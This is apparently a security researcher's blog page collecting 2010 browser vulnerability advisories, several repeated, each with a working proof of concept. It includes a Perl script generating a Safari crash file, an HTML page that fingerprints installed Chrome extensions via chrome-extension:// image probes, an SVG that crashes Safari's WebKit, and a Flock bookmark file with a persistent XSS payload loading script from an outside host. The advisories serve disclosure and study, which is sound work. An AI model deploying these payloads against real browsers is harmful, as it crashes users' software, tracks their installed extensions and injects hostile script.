#########################################################
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
Vendor URL:http://www.Apple.com
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html
Vendor notify: NO exploit available: YES
##########################################################
Safari for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
safari for windows 5.0.2(7533.18.5)
###########
Sample PoC
###########
Generate the Crash file and open it with safari,it hangs and arround one minut it crash
with a anormal program termination.
#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_safari.html";
my $junk= "A/" x 20000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_safari.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome Instaled extensions arbitrary detection
Tuesday, September 07, 2010
######################################################
Google Chrome Instaled extensions arbitrary detection
Vendor url: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify:YES vendor confirmed.YES exploit:YES
######################################################
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html
#########
Abstract
#########
How safe is use extensions ?
a attacker can access via iframe to resource extensions ( at this moment i
don´t have found a way to altered information from extensions).
like
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
for example...
a remote user can modify this web doc and call it with meta tag "base"
in a malformed doc...
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
so i thnik that chrome-extension need sanitizacion to don´t access internal
resources from external web pages..( file:/// and other protocols handlers
are safe to use and don´t give access to internal resources from external
web docs...)
So chrome-extension protocol handler can be used to get extensions instaled
on client browser...and them if any extension is vulnerable to something
this information can be used for exploit this extension...
In incognito mode Extensions can be detectable too
###########################
A sample PoC of detection
###########################
<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>
####################EOF##########################
##############
Timeline
##############
Discovered:27 may 2010
Vendor notify:01 jun 2010
Vendor patch:02 sep 2010
disclosure: 07 sep 2010
#######################€ND ########################
Thnx To Climbo for his patience and support.
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome Instaled extensions arbitrary detection
Vendor url: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify:YES vendor confirmed.YES exploit:YES
######################################################
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html
#########
Abstract
#########
How safe is use extensions ?
a attacker can access via iframe to resource extensions ( at this moment i
don´t have found a way to altered information from extensions).
like
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
for example...
a remote user can modify this web doc and call it with meta tag "base"
in a malformed doc...
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
so i thnik that chrome-extension need sanitizacion to don´t access internal
resources from external web pages..( file:/// and other protocols handlers
are safe to use and don´t give access to internal resources from external
web docs...)
So chrome-extension protocol handler can be used to get extensions instaled
on client browser...and them if any extension is vulnerable to something
this information can be used for exploit this extension...
In incognito mode Extensions can be detectable too
###########################
A sample PoC of detection
###########################
<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>
####################EOF##########################
##############
Timeline
##############
Discovered:27 may 2010
Vendor notify:01 jun 2010
Vendor patch:02 sep 2010
disclosure: 07 sep 2010
#######################€ND ########################
Thnx To Climbo for his patience and support.
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows Invalid SGV text style Webkit.dll DoS
Monday, August 30, 2010
###################################################
Safari for windows Invalid SGV text style Webkit.dll DoS
Vendor URL:www.apple.com
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notify :Yes exploit available :YES
###################################################
Safari browser for windows is prone vulnerable to a Denial of
service condition , this issue affects webkit.dll and cause a
crash when Safari try to render a SGV image with a very long
font size text style.
############
versions
############
Safari for windows 5.0.1 (7533.17.8)
on windows 7 ultimate fully patched.
Safari for windows windows 5.0.1 (7533.17.8)
on windows xp home sp3 fully patched
############
Timeline
############
Discovered:19-08-2010
vendor notofy:25-08-2010
Vendor response:26-08-2010
Disclosure: 30-09-2010
####################
Proof Of Concept
####################
Save This code as image.svg and open it with Safari,look
i have add some "extra" pixels in font size text style.
################ BOF image.svg ######################
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>
<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>
</svg>
###############EOF####################
################# €nd ###############
Thnx To Climbo for his patience and support.
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows Invalid SGV text style Webkit.dll DoS
Vendor URL:www.apple.com
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notify :Yes exploit available :YES
###################################################
Safari browser for windows is prone vulnerable to a Denial of
service condition , this issue affects webkit.dll and cause a
crash when Safari try to render a SGV image with a very long
font size text style.
############
versions
############
Safari for windows 5.0.1 (7533.17.8)
on windows 7 ultimate fully patched.
Safari for windows windows 5.0.1 (7533.17.8)
on windows xp home sp3 fully patched
############
Timeline
############
Discovered:19-08-2010
vendor notofy:25-08-2010
Vendor response:26-08-2010
Disclosure: 30-09-2010
####################
Proof Of Concept
####################
Save This code as image.svg and open it with Safari,look
i have add some "extra" pixels in font size text style.
################ BOF image.svg ######################
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>
<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>
</svg>
###############EOF####################
################# €nd ###############
Thnx To Climbo for his patience and support.
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Thursday, August 19, 2010
#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notify:NO exploits availables:YES
#########################################
Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project
Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.
###############################
Example Of Bookmark html file
###############################
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>MenĂº Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>
#####################EOF##################
It is a persintent script insercion and when the user click in the menu for view
favorites page or access directly to favorites url this make a "defacement" of this page and them the user can´t access to favorites :)
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )
################# €nd #######################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notify:NO exploits availables:YES
#########################################
Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project
Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.
###############################
Example Of Bookmark html file
###############################
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>MenĂº Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>
#####################EOF##################
It is a persintent script insercion and when the user click in the menu for view
favorites page or access directly to favorites url this make a "defacement" of this page and them the user can´t access to favorites :)
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )
################# €nd #######################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)